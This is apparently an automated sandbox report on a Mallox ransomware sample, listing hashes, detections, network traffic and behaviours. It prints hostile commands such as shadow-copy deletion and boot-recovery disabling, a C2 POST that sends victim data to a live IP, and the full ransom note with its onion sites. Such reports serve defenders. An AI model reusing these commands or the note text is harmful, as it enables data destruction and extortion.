Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 1, 2024, 8:49 a.m.	June 1, 2024, 9 a.m.

Size	478.5KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`71efe7a21da183c407682261612afc0f`
SHA256	`45a236e7aa80515aafb6c656c758faad6e77fb435b35bfa407aef3918212078d`
CRC32	`3A9EDFB7`
ssdeep	`6144:W0wmbI4/Z4SHvrxw6zaIST1w9wEPDasWxxsBhS37b8o6XCFyPwCMa6qnXxq/y:7zv66zaISTW9asWxxAh4IlXC4PUqBq/`
Yara	IsPE64 - (no description) Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer Antivirus - Contains references to security software UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

ld.exe "C:\Users\test22\AppData\Local\Temp\ld.exe"
2564
- cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
  2692
  - bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
    2752
- cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
  2796
  - bcdedit.exe bcdedit /set {current} recoveryenabled no
    2860

Name	Response	Post-Analysis Lookup
api.ipify.org	A 104.26.13.205 A 172.67.74.152 A 104.26.12.205	104.26.13.205

IP Address	Status	Action
104.26.13.205	Active	Moloch
164.124.101.2	Active	Moloch
91.215.85.135	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
UDP 192.168.56.101:59002 -> 8.8.8.8:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 91.215.85.135:80 -> 192.168.56.101:49172	2400013	ET DROP Spamhaus DROP Listed Traffic Inbound group 14	Misc Attack
TCP 192.168.56.101:49171 -> 104.26.13.205:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49172 -> 91.215.85.135:80	2039815	ET MALWARE Win32/Filecoder.OJC CnC Checkin	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA June 1, 2024, 8:49 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 1, 2024, 8:49 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW June 1, 2024, 8:49 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1	0

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll
file	C:\Program Files\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 1, 2024, 8:49 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

_RDATA

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://api.ipify.org/
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address				suspicious_request	POST http://91.215.85.135/QWEwqdsvsf/ap.php

Performs some HTTP requests (2 events)

request	GET http://api.ipify.org/
request	POST http://91.215.85.135/QWEwqdsvsf/ap.php

Sends data using the HTTP POST Method (1 event)

request

POST http://91.215.85.135/QWEwqdsvsf/ap.php

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 1, 2024, 8:49 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1	0	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (5 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW June 1, 2024, 8:49 a.m.	total_number_of_free_bytes: 13324304384 free_bytes_available: 13324304384 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW June 1, 2024, 8:49 a.m.	total_number_of_free_bytes: 75362304 free_bytes_available: 75362304 root_path: E: total_number_of_bytes: 104853504	1	1
GetDiskFreeSpaceExW June 1, 2024, 8:49 a.m.	total_number_of_free_bytes: 13324267520 free_bytes_available: 0 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW June 1, 2024, 8:49 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: D:\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW June 1, 2024, 8:49 a.m.	total_number_of_free_bytes: 75358208 free_bytes_available: 0 root_path: E:\ total_number_of_bytes: 104853504	1	1

Steals private information from local Internet browsers (50 out of 129 events)

file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Shortcuts
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates a shortcut to an executable file (15 events)

file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk

Creates a suspicious process (6 events)

cmdline	bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	cmd.exe /c bcdedit /set {current} recoveryenabled no
cmdline	bcdedit /set {current} recoveryenabled no
cmdline	"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 1, 2024, 8:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bcdedit /set {current} bootstatuspolicy ignoreallfailures filepath: cmd.exe	1	1
ShellExecuteExW June 1, 2024, 8:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bcdedit /set {current} recoveryenabled no filepath: cmd.exe	1	1
ShellExecuteExW June 1, 2024, 8:49 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\vssadmin.exe parameters: delete shadows /all /quiet filepath: C:\Windows\sysnative\vssadmin.exe		0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW June 1, 2024, 8:49 a.m.	snapshot_handle: 0x00000000000001b8 process_name: ld.exe process_identifier: 2564	1	1	0
Process32NextW June 1, 2024, 8:49 a.m.	snapshot_handle: 0x00000000000001b8 process_name: cmd.exe process_identifier: 2796	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (10 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW June 1, 2024, 8:49 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1

Communicates with host for which no DNS query was performed (1 event)

host

91.215.85.135

Enumerates services, possibly for anti-virtualization (1 event)

Time & API	Arguments	Status	Return	Repeated
EnumServicesStatusW June 1, 2024, 8:49 a.m.	service_handle: 0x0000000000403140 service_type: 48 service_status: 3		0	0

Creates known Hupigon files, registry keys and/or mutexes (1 event)

file	\Device\HarddiskVolume1\Boot\BOOTSTAT.DAT

Modifies boot configuration settings (4 events)

command	"c:\windows\system32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
command	"c:\windows\system32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
command	bcdedit /set {current} bootstatuspolicy ignoreallfailures
command	bcdedit /set {current} recoveryenabled no

Runs bcdedit commands specific to ransomware (2 events)

cmdline	bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	bcdedit /set {current} recoveryenabled no

Writes a potential ransom message to disk (9 events)

Time & API	Arguments	Status
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002a8 filepath: C:\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002c4 filepath: C:\$Recycle.Bin\S-1-5-21-3832866432-4053218753-3017428901-1001\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002ac filepath: C:\$Recycle.Bin\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002bc filepath: \Device\HarddiskVolume1\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002bc filepath: \Device\HarddiskVolume1\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002bc filepath: C:\Users\Public\Desktop\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002c4 filepath: C:\Users\Public\Music\Sample Music\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002c8 filepath: C:\Users\Public\Music\HOW TO BACK FILES.txt	1
NtWriteFile June 1, 2024, 8:49 a.m.	buffer: Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 515F095FE81ADA75B2AA47C6 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion offset: 0 file_handle: 0x00000000000002c4 filepath: C:\Users\Public\Pictures\Sample Pictures\HOW TO BACK FILES.txt	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (1 event)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestW June 1, 2024, 8:50 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: 91.215.85.135 request_handle: 0x0000000000cc000c post_data: user=mallox&TargetID=515F095FE81ADA75B2AA47C6&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=19	1	1	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

C:\Windows\sysnative\vssadmin.exe delete shadows /all /quiet

File has been identified by 61 AntiVirus engines on VirusTotal as malicious (50 out of 61 events)

Bkav	W32.Common.AB1E3033
Lionic	Trojan.Win32.Mallox.j!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Ransom.Mallox.S33100643
Skyhigh	BehavesLike.Win64.NetLoader.gh
ALYac	Trojan.Ransom.Filecoder
Cylance	Unsafe
VIPRE	Gen:Variant.Lazy.436214
Sangfor	Ransom.Win32.Behaviour.swkaa
K7AntiVirus	Trojan ( 005aa3791 )
BitDefender	Gen:Variant.Lazy.436214
K7GW	Trojan ( 005aa3791 )
Cybereason	malicious.21da18
Arcabit	Trojan.Lazy.D6A7F6
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/Filecoder.Mallox.A
APEX	Malicious
McAfee	Artemis!71EFE7A21DA1
Avast	Win64:RansomX-gen [Ransom]
ClamAV	Win.Ransomware.Mallox-10030404-0
Kaspersky	HEUR:Trojan-Ransom.Win32.Generic
Alibaba	Ransom:Win64/Mallox.c8e74f9e
NANO-Antivirus	Trojan.Win64.Encoder.knhmof
MicroWorld-eScan	Gen:Variant.Lazy.436214
Rising	Ransom.OutSider!1.D74B (CLASSIC)
Emsisoft	Gen:Variant.Lazy.436214 (B)
F-Secure	Heuristic.HEUR/AGEN.1372165
DrWeb	Trojan.Encoder.38731
Zillya	Trojan.Filecoder.Win64.114260
McAfeeD	ti!45A236E7AA80
Trapmine	suspicious.low.ml.score
FireEye	Generic.mg.71efe7a21da183c4
Sophos	Troj/Mallox-B
Ikarus	Trojan-Ransom.Mallox
Jiangmin	Trojan.Generic.hsdeh
Google	Detected
Avira	HEUR/AGEN.1372165
Antiy-AVL	Trojan/Win32.Agent
Kingsoft	Win32.Trojan-Ransom.Generic.a
Gridinsoft	Ransom.Win64.AI.sa
Microsoft	Ransom:Win64/Mallox.CCCM!MTB
ViRobot	Trojan.Win.Z.Mallox.489984.G
ZoneAlarm	HEUR:Trojan-Ransom.Win32.Generic
GData	Gen:Variant.Lazy.436214
Varist	W64/ABRisk.EOOZ-6139
AhnLab-V3	Ransomware/Win.Mallox.R648404
TACHYON	Ransom/W64.Agent.489984
DeepInstinct	MALICIOUS
VBA32	Trojan.Encoder

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 events)

dead_host	192.168.56.1:139
dead_host	192.168.56.1:445
dead_host	192.168.56.1:135
dead_host	192.168.56.101:49169
dead_host	192.168.56.101:49166
dead_host	192.168.56.101:49168
dead_host	192.168.56.101:49175
dead_host	192.168.56.101:49173

ld.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All